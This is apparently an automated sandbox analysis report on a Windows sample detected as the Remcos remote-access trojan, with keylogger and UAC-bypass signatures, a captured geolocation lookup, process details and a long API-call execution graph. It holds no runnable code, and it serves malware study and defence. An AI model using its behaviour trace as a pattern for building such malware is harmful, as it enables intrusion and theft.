                                        Nov 21, 2024 01:07:06.213676929 CET1170INHTTP/1.1 200 OK
                                        date: Thu, 21 Nov 2024 00:07:05 GMT
                                        server: Apache
                                        content-length: 962
                                        content-type: application/json; charset=utf-8
                                        cache-control: public, max-age=300
                                        access-control-allow-origin: *
                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Target ID:0
                                        Start time:19:07:00
                                        Start date:20/11/2024
                                        Path:C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe"
                                        Imagebase:0x400000
                                        File size:494'592 bytes
                                        MD5 hash:3CC6B6EF2D90A55B3A9CB4B2F9C1526C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:4.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:21.3%
                                          Total number of Nodes:1396
                                          Total number of Limit Nodes:65
                                          execution_graph 47194 415d41 47209 41b411 47194->47209 47196 415d4a 47220 4020f6 47196->47220 47200 415d65 47201 4170c4 47200->47201 47227 401fd8 47200->47227 47230 401e8d 47201->47230 47205 401fd8 11 API calls 47206 4170d9 47205->47206 47207 401fd8 11 API calls 47206->47207 47208 4170e5 47207->47208 47236 4020df 47209->47236 47214 41b456 InternetReadFile 47218 41b479 47214->47218 47216 41b4a6 InternetCloseHandle InternetCloseHandle 47217 41b4b8 47216->47217 47217->47196 47218->47214 47218->47216 47219 401fd8 11 API calls 47218->47219 47247 4020b7 47218->47247 47219->47218 47221 40210c 47220->47221 47222 4023ce 11 API calls 47221->47222 47223 402126 47222->47223 47224 402569 28 API calls 47223->47224 47225 402134 47224->47225 47226 404aa1 61 API calls ctype 47225->47226 47226->47200 47228 4023ce 11 API calls 47227->47228 47229 401fe1 47228->47229 47229->47201 47231 402163 47230->47231 47235 40219f 47231->47235 47287 402730 11 API calls 47231->47287 47233 402184 47288 402712 11 API calls std::_Deallocate 47233->47288 47235->47205 47237 4020e7 47236->47237 47253 4023ce 47237->47253 47239 4020f2 47240 43bda0 47239->47240 47245 4461b8 ___crtLCMapStringA 47240->47245 47241 4461f6 47259 44062d 20 API calls _Atexit 47241->47259 47242 4461e1 RtlAllocateHeap 47244 41b42f InternetOpenW InternetOpenUrlW 47242->47244 47242->47245 47244->47214 47245->47241 47245->47242 47258 443001 7 API calls 2 library calls 47245->47258 47248 4020bf 47247->47248 47249 4023ce 11 API calls 47248->47249 47250 4020ca 47249->47250 47260 40250a 47250->47260 47252 4020d9 47252->47218 47254 4023d8 47253->47254 47255 402428 47253->47255 47254->47255 47257 4027a7 11 API calls std::_Deallocate 47254->47257 47255->47239 47257->47255 47258->47245 47259->47244 47261 40251a 47260->47261 47262 402520 47261->47262 47263 402535 47261->47263 47267 402569 47262->47267 47277 4028e8 28 API calls 47263->47277 47266 402533 47266->47252 47278 402888 47267->47278 47269 40257d 47270 402592 47269->47270 47271 4025a7 47269->47271 47283 402a34 22 API calls 47270->47283 47285 4028e8 28 API calls 47271->47285 47274 40259b 47284 4029da 22 API calls 47274->47284 47275 4025a5 47275->47266 47277->47266 47279 402890 47278->47279 47280 402898 47279->47280 47286 402ca3 22 API calls 47279->47286 47280->47269 47283->47274 47284->47275 47285->47275 47287->47233 47288->47235 47289 426a77 47290 426a8c 47289->47290 47295 426b1e 47289->47295 47291 426bd5 47290->47291 47292 426ad9 47290->47292 47293 426b4e 47290->47293 47294 426bae 47290->47294 47290->47295 47299 426b83 47290->47299 47302 426b0e 47290->47302 47317 424f6e 49 API calls ctype 47290->47317 47291->47295 47322 4261e6 28 API calls 47291->47322 47292->47295 47292->47302 47318 41fbfd 52 API calls 47292->47318 47293->47295 47293->47299 47320 41fbfd 52 API calls 47293->47320 47294->47291 47294->47295 47305 425b72 47294->47305 47299->47294 47321 425781 21 API calls 47299->47321 47302->47293 47302->47295 47319 424f6e 49 API calls ctype 47302->47319 47306 425b91 ___scrt_get_show_window_mode 47305->47306 47308 425ba0 47306->47308 47311 425bc5 47306->47311 47323 41ec4c 21 API calls 47306->47323 47308->47311 47316 425ba5 47308->47316 47324 420669 46 API calls 47308->47324 47311->47291 47312 425bae 47312->47311 47331 424d96 21 API calls 2 library calls 47312->47331 47314 425c48 47314->47311 47325 432f55 47314->47325 47316->47311 47316->47312 47330 41daf0 49 API calls 47316->47330 47317->47292 47318->47292 47319->47293 47320->47293 47321->47294 47322->47295 47323->47308 47324->47314 47326 432f63 47325->47326 47327 432f5f 47325->47327 47328 43bda0 new 21 API calls 47326->47328 47327->47316 47329 432f68 47328->47329 47329->47316 47330->47312 47331->47311 47332 4437fd 47333 443806 47332->47333 47338 44381f 47332->47338 47334 44380e 47333->47334 47339 443885 47333->47339 47336 443816 47336->47334 47350 443b52 22 API calls 2 library calls 47336->47350 47340 443891 47339->47340 47341 44388e 47339->47341 47351 44f45d GetEnvironmentStringsW 47340->47351 47341->47336 47344 44389e 47346 446802 _free 20 API calls 47344->47346 47347 4438d3 47346->47347 47347->47336 47349 4438a9 47359 446802 47349->47359 47350->47338 47352 44f471 47351->47352 47353 443898 47351->47353 47365 4461b8 47352->47365 47353->47344 47358 4439aa 26 API calls 3 library calls 47353->47358 47355 446802 _free 20 API calls 47357 44f49f FreeEnvironmentStringsW 47355->47357 47356 44f485 ctype 47356->47355 47357->47353 47358->47349 47360 44680d RtlFreeHeap 47359->47360 47361 446836 _free 47359->47361 47360->47361 47362 446822 47360->47362 47361->47344 47374 44062d 20 API calls _Atexit 47362->47374 47364 446828 GetLastError 47364->47361 47366 4461f6 47365->47366 47367 4461c6 ___crtLCMapStringA 47365->47367 47373 44062d 20 API calls _Atexit 47366->47373 47367->47366 47368 4461e1 RtlAllocateHeap 47367->47368 47372 443001 7 API calls 2 library calls 47367->47372 47368->47367 47370 4461f4 47368->47370 47370->47356 47372->47367 47373->47370 47374->47364 47375 43bea8 47377 43beb4 _swprintf ___DestructExceptionObject 47375->47377 47376 43bec2 47391 44062d 20 API calls _Atexit 47376->47391 47377->47376 47379 43beec 47377->47379 47386 445909 EnterCriticalSection 47379->47386 47381 43bec7 ___DestructExceptionObject __cftof 47382 43bef7 47387 43bf98 47382->47387 47386->47382 47388 43bfa6 47387->47388 47390 43bf02 47388->47390 47393 4497ec 37 API calls 2 library calls 47388->47393 47392 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47390->47392 47391->47381 47392->47381 47393->47388 47394 434918 47395 434924 ___DestructExceptionObject 47394->47395 47421 434627 47395->47421 47397 43492b 47399 434954 47397->47399 47719 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47397->47719 47407 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47399->47407 47720 4442d2 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47399->47720 47401 43496d 47403 434973 ___DestructExceptionObject 47401->47403 47721 444276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47401->47721 47404 4349f3 47432 434ba5 47404->47432 47407->47404 47722 443487 36 API calls 5 library calls 47407->47722 47414 434a15 47415 434a1f 47414->47415 47724 4434bf 28 API calls _Atexit 47414->47724 47417 434a28 47415->47417 47725 443462 28 API calls _Atexit 47415->47725 47726 43479e 13 API calls 2 library calls 47417->47726 47420 434a30 47420->47403 47422 434630 47421->47422 47727 434cb6 IsProcessorFeaturePresent 47422->47727 47424 43463c 47728 438fb1 10 API calls 4 library calls 47424->47728 47426 434641 47427 434645 47426->47427 47729 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47426->47729 47427->47397 47429 43464e 47430 43465c 47429->47430 47730 438fda 8 API calls 3 library calls 47429->47730 47430->47397 47731 436f10 47432->47731 47435 4349f9 47436 444223 47435->47436 47733 44f0d9 47436->47733 47438 44422c 47439 434a02 47438->47439 47737 446895 36 API calls 47438->47737 47441 40ea00 47439->47441 47739 41cbe1 LoadLibraryA GetProcAddress 47441->47739 47443 40ea1c GetModuleFileNameW 47744 40f3fe 47443->47744 47445 40ea38 47446 4020f6 28 API calls 47445->47446 47447 40ea47 47446->47447 47448 4020f6 28 API calls 47447->47448 47449 40ea56 47448->47449 47759 41beac 47449->47759 47453 40ea68 47454 401e8d 11 API calls 47453->47454 47455 40ea71 47454->47455 47456 40ea84 47455->47456 47457 40eace 47455->47457 48050 40fbee 118 API calls 47456->48050 47785 401e65 47457->47785 47460 40eade 47464 401e65 22 API calls 47460->47464 47461 40ea96 47462 401e65 22 API calls 47461->47462 47463 40eaa2 47462->47463 48051 410f72 36 API calls __EH_prolog 47463->48051 47465 40eafd 47464->47465 47790 40531e 47465->47790 47468 40eb0c 47795 406383 47468->47795 47469 40eab4 48052 40fb9f 78 API calls 47469->48052 47473 40eabd 48053 40f3eb 71 API calls 47473->48053 47477 401fd8 11 API calls 47478 40eb2d 47477->47478 47481 401fd8 11 API calls 47478->47481 47479 401fd8 11 API calls 47480 40ef36 47479->47480 47723 443396 GetModuleHandleW 47480->47723 47482 40eb36 47481->47482 47483 401e65 22 API calls 47482->47483 47484 40eb3f 47483->47484 47809 401fc0 47484->47809 47486 40eb4a 47487 401e65 22 API calls 47486->47487 47488 40eb63 47487->47488 47489 401e65 22 API calls 47488->47489 47490 40eb7e 47489->47490 47491 40ebe9 47490->47491 48054 406c59 47490->48054 47492 401e65 22 API calls 47491->47492 47498 40ebf6 47492->47498 47494 40ebab 47495 401fe2 28 API calls 47494->47495 47496 40ebb7 47495->47496 47497 401fd8 11 API calls 47496->47497 47500 40ebc0 47497->47500 47499 40ec3d 47498->47499 47503 413584 3 API calls 47498->47503 47813 40d0a4 47499->47813 48059 413584 RegOpenKeyExA 47500->48059 47502 40ec43 47504 40eac6 47502->47504 47816 41b354 47502->47816 47510 40ec21 47503->47510 47504->47479 47508 40ec5e 47511 40ecb1 47508->47511 47833 407751 47508->47833 47509 40f38a 48137 4139e4 30 API calls 47509->48137 47510->47499 48062 4139e4 30 API calls 47510->48062 47513 401e65 22 API calls 47511->47513 47516 40ecba 47513->47516 47526 40ecc6 47516->47526 47527 40eccb 47516->47527 47518 40f3a0 48138 4124b0 65 API calls ___scrt_get_show_window_mode 47518->48138 47519 40ec87 47523 401e65 22 API calls 47519->47523 47520 40ec7d 48063 407773 30 API calls 47520->48063 47535 40ec90 47523->47535 47524 40f3aa 47525 41bcef 28 API calls 47524->47525 47529 40f3ba 47525->47529 48066 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47526->48066 47532 401e65 22 API calls 47527->47532 47528 40ec82 48064 40729b 98 API calls 47528->48064 47942 413a5e RegOpenKeyExW 47529->47942 47533 40ecd4 47532->47533 47837 41bcef 47533->47837 47535->47511 47539 40ecac 47535->47539 47536 40ecdf 47841 401f13 47536->47841 48065 40729b 98 API calls 47539->48065 47543 401f09 11 API calls 47545 40f3d7 47543->47545 47547 401f09 11 API calls 47545->47547 47549 40f3e0 47547->47549 47548 401e65 22 API calls 47550 40ecfc 47548->47550 47945 40dd7d 47549->47945 47554 401e65 22 API calls 47550->47554 47556 40ed16 47554->47556 47555 40f3ea 47557 401e65 22 API calls 47556->47557 47558 40ed30 47557->47558 47559 401e65 22 API calls 47558->47559 47560 40ed49 47559->47560 47561 40edb6 47560->47561 47562 401e65 22 API calls 47560->47562 47563 40edc5 47561->47563 47569 40ef41 ___scrt_get_show_window_mode 47561->47569 47567 40ed5e _wcslen 47562->47567 47564 40edce 47563->47564 47591 40ee4a ___scrt_get_show_window_mode 47563->47591 47565 401e65 22 API calls 47564->47565 47566 40edd7 47565->47566 47568 401e65 22 API calls 47566->47568 47567->47561 47571 401e65 22 API calls 47567->47571 47570 40ede9 47568->47570 48127 413733 RegOpenKeyExA 47569->48127 47574 401e65 22 API calls 47570->47574 47572 40ed79 47571->47572 47575 401e65 22 API calls 47572->47575 47576 40edfb 47574->47576 47577 40ed8e 47575->47577 47579 401e65 22 API calls 47576->47579 48067 40da6f 47577->48067 47578 40ef8c 47580 401e65 22 API calls 47578->47580 47583 40ee24 47579->47583 47581 40efb1 47580->47581 47863 402093 47581->47863 47588 401e65 22 API calls 47583->47588 47585 401f13 28 API calls 47587 40edad 47585->47587 47592 401f09 11 API calls 47587->47592 47589 40ee35 47588->47589 48125 40ce34 46 API calls _wcslen 47589->48125 47590 40efc3 47869 4137aa RegCreateKeyA 47590->47869 47853 413982 47591->47853 47592->47561 47596 40ee45 47596->47591 47598 40eede ctype 47601 401e65 22 API calls 47598->47601 47599 401e65 22 API calls 47600 40efe5 47599->47600 47875 43bb2c 47600->47875 47602 40eef5 47601->47602 47602->47578 47605 40ef09 47602->47605 47608 401e65 22 API calls 47605->47608 47606 40effc 48130 41ce2c 88 API calls ___scrt_get_show_window_mode 47606->48130 47607 40f01f 47612 402093 28 API calls 47607->47612 47610 40ef12 47608->47610 47613 41bcef 28 API calls 47610->47613 47611 40f003 CreateThread 47611->47607 48959 41d4ee 10 API calls 47611->48959 47614 40f034 47612->47614 47615 40ef1e 47613->47615 47616 402093 28 API calls 47614->47616 48126 40f4af 107 API calls 47615->48126 47618 40f043 47616->47618 47879 41b580 47618->47879 47619 40ef23 47619->47578 47621 40ef2a 47619->47621 47621->47504 47623 401e65 22 API calls 47624 40f054 47623->47624 47625 401e65 22 API calls 47624->47625 47626 40f066 47625->47626 47627 401e65 22 API calls 47626->47627 47628 40f086 47627->47628 47629 43bb2c _strftime 40 API calls 47628->47629 47630 40f093 47629->47630 47631 401e65 22 API calls 47630->47631 47632 40f09e 47631->47632 47633 401e65 22 API calls 47632->47633 47634 40f0af 47633->47634 47635 401e65 22 API calls 47634->47635 47636 40f0c4 47635->47636 47637 401e65 22 API calls 47636->47637 47638 40f0d5 47637->47638 47639 40f0dc StrToIntA 47638->47639 47903 409e1f 47639->47903 47642 401e65 22 API calls 47643 40f0f7 47642->47643 47644 40f103 47643->47644 47645 40f13c 47643->47645 48131 43455e 22 API calls 2 library calls 47644->48131 47648 401e65 22 API calls 47645->47648 47647 40f10c 47649 401e65 22 API calls 47647->47649 47651 40f14c 47648->47651 47650 40f11f 47649->47650 47652 40f126 CreateThread 47650->47652 47653 40f194 47651->47653 47654 40f158 47651->47654 47652->47645 48957 41a045 110 API calls 2 library calls 47652->48957 47655 401e65 22 API calls 47653->47655 48132 43455e 22 API calls 2 library calls 47654->48132 47658 40f19d 47655->47658 47657 40f161 47659 401e65 22 API calls 47657->47659 47661 40f207 47658->47661 47662 40f1a9 47658->47662 47660 40f173 47659->47660 47663 40f17a CreateThread 47660->47663 47664 401e65 22 API calls 47661->47664 47665 401e65 22 API calls 47662->47665 47663->47653 48962 41a045 110 API calls 2 library calls 47663->48962 47666 40f210 47664->47666 47667 40f1b9 47665->47667 47668 40f255 47666->47668 47669 40f21c 47666->47669 47670 401e65 22 API calls 47667->47670 47928 41b69e GetComputerNameExW GetUserNameW 47668->47928 47673 401e65 22 API calls 47669->47673 47671 40f1ce 47670->47671 48133 40da23 32 API calls 47671->48133 47674 40f225 47673->47674 47679 401e65 22 API calls 47674->47679 47676 401f13 28 API calls 47678 40f269 47676->47678 47681 401f09 11 API calls 47678->47681 47683 40f23a 47679->47683 47680 40f1e1 47684 401f13 28 API calls 47680->47684 47682 40f272 47681->47682 47685 40f27b SetProcessDEPPolicy 47682->47685 47686 40f27e CreateThread 47682->47686 47693 43bb2c _strftime 40 API calls 47683->47693 47687 40f1ed 47684->47687 47685->47686 47688 40f293 CreateThread 47686->47688 47689 40f29f 47686->47689 48930 40f7e2 47686->48930 47690 401f09 11 API calls 47687->47690 47688->47689 48958 412132 139 API calls 47688->48958 47691 40f2b4 47689->47691 47692 40f2a8 CreateThread 47689->47692 47694 40f1f6 CreateThread 47690->47694 47696 40f307 47691->47696 47698 402093 28 API calls 47691->47698 47692->47691 48960 412716 38 API calls ___scrt_get_show_window_mode 47692->48960 47695 40f247 47693->47695 47694->47661 48961 401a6d 50 API calls _strftime 47694->48961 48134 40c19d 7 API calls 47695->48134 47939 41353a RegOpenKeyExA 47696->47939 47699 40f2d7 47698->47699 48135 4052fd 28 API calls 47699->48135 47704 40f328 47707 41bcef 28 API calls 47704->47707 47709 40f338 47707->47709 48136 413656 31 API calls 47709->48136 47713 40f34e 47714 401f09 11 API calls 47713->47714 47717 40f359 47714->47717 47715 40f381 DeleteFileW 47716 40f388 47715->47716 47715->47717 47716->47524 47717->47524 47717->47715 47718 40f36f Sleep 47717->47718 47718->47717 47719->47397 47720->47401 47721->47407 47722->47404 47723->47414 47724->47415 47725->47417 47726->47420 47727->47424 47728->47426 47729->47429 47730->47427 47732 434bb8 GetStartupInfoW 47731->47732 47732->47435 47734 44f0eb 47733->47734 47735 44f0e2 47733->47735 47734->47438 47738 44efd8 49 API calls 4 library calls 47735->47738 47737->47438 47738->47734 47740 41cc20 LoadLibraryA GetProcAddress 47739->47740 47741 41cc10 GetModuleHandleA GetProcAddress 47739->47741 47742 41cc49 44 API calls 47740->47742 47743 41cc39 LoadLibraryA GetProcAddress 47740->47743 47741->47740 47742->47443 47743->47742 48139 41b539 FindResourceA 47744->48139 47747 43bda0 new 21 API calls 47748 40f428 ctype 47747->47748 47749 4020b7 28 API calls 47748->47749 47750 40f443 47749->47750 47751 401fe2 28 API calls 47750->47751 47752 40f44e 47751->47752 47753 401fd8 11 API calls 47752->47753 47754 40f457 47753->47754 47755 43bda0 new 21 API calls 47754->47755 47756 40f468 ctype 47755->47756 48142 406e13 47756->48142 47758 40f49b 47758->47445 47760 4020df 11 API calls 47759->47760 47780 41bebf 47760->47780 47761 41bf2f 47762 401fd8 11 API calls 47761->47762 47763 41bf61 47762->47763 47764 401fd8 11 API calls 47763->47764 47766 41bf69 47764->47766 47765 41bf31 47767 4041a2 28 API calls 47765->47767 47769 401fd8 11 API calls 47766->47769 47770 41bf3d 47767->47770 47771 40ea5f 47769->47771 47772 401fe2 28 API calls 47770->47772 47781 40fb52 47771->47781 47774 41bf46 47772->47774 47773 401fe2 28 API calls 47773->47780 47775 401fd8 11 API calls 47774->47775 47777 41bf4e 47775->47777 47776 401fd8 11 API calls 47776->47780 48149 41cec5 28 API calls 47777->48149 47780->47761 47780->47765 47780->47773 47780->47776 48145 4041a2 47780->48145 48148 41cec5 28 API calls 47780->48148 47782 40fb5e 47781->47782 47784 40fb65 47781->47784 48156 402163 11 API calls 47782->48156 47784->47453 47786 401e6d 47785->47786 47787 401e75 47786->47787 48157 402158 22 API calls 47786->48157 47787->47460 47791 4020df 11 API calls 47790->47791 47792 40532a 47791->47792 48158 4032a0 47792->48158 47794 405346 47794->47468 48163 4051ef 47795->48163 47797 406391 48167 402055 47797->48167 47800 401fe2 47801 401ff1 47800->47801 47808 402039 47800->47808 47802 4023ce 11 API calls 47801->47802 47803 401ffa 47802->47803 47804 40203c 47803->47804 47806 402015 47803->47806 47805 40267a 11 API calls 47804->47805 47805->47808 48201 403098 28 API calls 47806->48201 47808->47477 47810 401fd2 47809->47810 47811 401fc9 47809->47811 47810->47486 48202 4025e0 28 API calls 47811->48202 48203 401fab 47813->48203 47815 40d0ae CreateMutexA GetLastError 47815->47502 48204 41c048 47816->48204 47821 401fe2 28 API calls 47822 41b390 47821->47822 47823 401fd8 11 API calls 47822->47823 47824 41b398 47823->47824 47825 4135e1 31 API calls 47824->47825 47827 41b3ee 47824->47827 47826 41b3c1 47825->47826 47828 41b3cc StrToIntA 47826->47828 47827->47508 47829 41b3e3 47828->47829 47830 41b3da 47828->47830 47832 401fd8 11 API calls 47829->47832 48213 41cffa 22 API calls 47830->48213 47832->47827 47834 407765 47833->47834 47835 413584 3 API calls 47834->47835 47836 40776c 47835->47836 47836->47519 47836->47520 47838 41bd03 47837->47838 48214 40b93f 47838->48214 47840 41bd0b 47840->47536 47842 401f22 47841->47842 47849 401f6a 47841->47849 47843 402252 11 API calls 47842->47843 47844 401f2b 47843->47844 47845 401f6d 47844->47845 47847 401f46 47844->47847 48247 402336 47845->48247 48246 40305c 28 API calls 47847->48246 47850 401f09 47849->47850 47851 402252 11 API calls 47850->47851 47852 401f12 47851->47852 47852->47548 47854 4139a0 47853->47854 47855 406e13 28 API calls 47854->47855 47856 4139b5 47855->47856 47857 4020f6 28 API calls 47856->47857 47858 4139c5 47857->47858 47859 4137aa 14 API calls 47858->47859 47860 4139cf 47859->47860 47861 401fd8 11 API calls 47860->47861 47862 4139dc 47861->47862 47862->47598 47864 40209b 47863->47864 47865 4023ce 11 API calls 47864->47865 47866 4020a6 47865->47866 48251 4024ed 47866->48251 47870 4137c3 47869->47870 47871 4137fa 47869->47871 47874 4137d5 RegSetValueExA RegCloseKey 47870->47874 47872 401fd8 11 API calls 47871->47872 47873 40efd9 47872->47873 47873->47599 47874->47871 47876 43bb45 _strftime 47875->47876 48255 43ae83 47876->48255 47878 40eff2 47878->47606 47878->47607 47880 41b631 47879->47880 47881 41b596 GetLocalTime 47879->47881 47882 401fd8 11 API calls 47880->47882 47883 40531e 28 API calls 47881->47883 47884 41b639 47882->47884 47885 41b5d8 47883->47885 47886 401fd8 11 API calls 47884->47886 47887 406383 28 API calls 47885->47887 47889 40f048 47886->47889 47888 41b5e4 47887->47888 48283 402f10 47888->48283 47889->47623 47892 406383 28 API calls 47893 41b5fc 47892->47893 48288 40723b 77 API calls 47893->48288 47895 41b60a 47896 401fd8 11 API calls 47895->47896 47897 41b616 47896->47897 47898 401fd8 11 API calls 47897->47898 47899 41b61f 47898->47899 47900 401fd8 11 API calls 47899->47900 47901 41b628 47900->47901 47902 401fd8 11 API calls 47901->47902 47902->47880 47904 409e3d _wcslen 47903->47904 47905 409e48 47904->47905 47906 409e5f 47904->47906 47907 40da6f 32 API calls 47905->47907 47908 40da6f 32 API calls 47906->47908 47909 409e50 47907->47909 47910 409e67 47908->47910 47911 401f13 28 API calls 47909->47911 47912 401f13 28 API calls 47910->47912 47914 409e5a 47911->47914 47913 409e75 47912->47913 47915 401f09 11 API calls 47913->47915 47917 401f09 11 API calls 47914->47917 47916 409e7d 47915->47916 48307 409196 28 API calls 47916->48307 47919 409eb4 47917->47919 48292 40a144 47919->48292 47920 409e8f 48308 403014 47920->48308 47925 401f13 28 API calls 47926 409ea4 47925->47926 47927 401f09 11 API calls 47926->47927 47927->47914 48512 40417e 47928->48512 47933 403014 28 API calls 47934 41b703 47933->47934 47935 401f09 11 API calls 47934->47935 47936 41b70c 47935->47936 47937 401f09 11 API calls 47936->47937 47938 40f25e 47937->47938 47938->47676 47940 41355b RegQueryValueExA RegCloseKey 47939->47940 47941 40f31f 47939->47941 47940->47941 47941->47549 47941->47704 47943 40f3cd 47942->47943 47944 413a7a RegDeleteValueW 47942->47944 47943->47543 47944->47943 47946 40dd96 47945->47946 47947 41353a 3 API calls 47946->47947 47948 40dd9d 47947->47948 47952 40ddbc 47948->47952 48606 401707 47948->48606 47950 40ddaa 48609 4138b2 RegCreateKeyA 47950->48609 47953 414f65 47952->47953 47954 4020df 11 API calls 47953->47954 47955 414f79 47954->47955 48623 41b944 47955->48623 47958 4020df 11 API calls 47959 414f8f 47958->47959 47960 401e65 22 API calls 47959->47960 47961 414f9d 47960->47961 47962 43bb2c _strftime 40 API calls 47961->47962 47963 414faa 47962->47963 47964 414fbc 47963->47964 47965 414faf Sleep 47963->47965 47966 402093 28 API calls 47964->47966 47965->47964 47967 414fcb 47966->47967 47968 401e65 22 API calls 47967->47968 47969 414fd4 47968->47969 47970 4020f6 28 API calls 47969->47970 47971 414fdf 47970->47971 47972 41beac 28 API calls 47971->47972 47973 414fe7 47972->47973 48627 40489e WSAStartup 47973->48627 47975 414ff1 47976 401e65 22 API calls 47975->47976 47977 414ffa 47976->47977 47978 401e65 22 API calls 47977->47978 48028 415079 47977->48028 47979 415013 47978->47979 47981 401e65 22 API calls 47979->47981 47980 4020f6 28 API calls 47980->48028 47982 415024 47981->47982 47984 401e65 22 API calls 47982->47984 47983 41beac 28 API calls 47983->48028 47985 415035 47984->47985 47986 401e65 22 API calls 47985->47986 47988 415046 47986->47988 47987 406c59 28 API calls 47987->48028 47991 401e65 22 API calls 47988->47991 47989 402f10 28 API calls 47989->48028 47990 401fe2 28 API calls 47990->48028 47992 415057 47991->47992 47994 401e65 22 API calls 47992->47994 47993 401fd8 11 API calls 47993->48028 47995 415069 47994->47995 48763 40473d 89 API calls 47995->48763 47997 40531e 28 API calls 47997->48028 47998 406383 28 API calls 47998->48028 48000 4151c7 WSAGetLastError 48764 41cb72 30 API calls 48000->48764 48005 402093 28 API calls 48006 4151d7 48005->48006 48006->48005 48008 41b580 80 API calls 48006->48008 48011 401e65 22 API calls 48006->48011 48012 401e8d 11 API calls 48006->48012 48013 43bb2c _strftime 40 API calls 48006->48013 48006->48028 48047 415aac CreateThread 48006->48047 48048 401fd8 11 API calls 48006->48048 48049 401f09 11 API calls 48006->48049 48765 4052fd 28 API calls 48006->48765 48767 40b08c 85 API calls 48006->48767 48768 404e26 99 API calls 48006->48768 48008->48006 48009 401e65 22 API calls 48009->48028 48011->48006 48012->48006 48014 415b0a Sleep 48013->48014 48014->48006 48015 402093 28 API calls 48015->48028 48016 41b580 80 API calls 48016->48028 48019 409097 28 API 